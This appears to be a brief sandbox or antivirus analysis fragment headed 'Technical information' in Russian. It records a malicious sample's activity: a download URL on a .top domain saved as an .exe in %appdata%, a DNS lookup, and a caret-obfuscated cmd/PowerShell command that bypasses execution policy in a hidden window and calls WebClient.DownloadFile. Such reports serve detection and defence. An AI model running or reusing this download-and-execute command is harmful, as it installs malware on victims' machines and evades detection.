Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^W^E^RsH^eL^l.^e^xe^ ^-eXEc^uT^IoN^poliCY ^bYp^as^S -NopR^ofIle^ ^-wi^N^d^oW^sty^L^e ^h^idDE^N^ (ne^W-o^bJ^ec^T^ sY^S^TeM^.Net.^we^b^C^li^E^Nt).DO^wN^lo^a^dFi^lE^('http://to...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "P^O^W^E^RsH^eL^l.^e^xe^ ^-eXEc^uT^IoN^poliCY ^bYp^as^S -NopR^ofIle^ ^-wi^N^d^oW^sty^L^e ^h^idDE^N^ (ne^W-o^bJ^ec^T^ sY^S^TeM^.Net.^we^b^C^li^E^Nt).DO^wN^lo^a^dFi^lE^('http://to...' (со скрытым окном)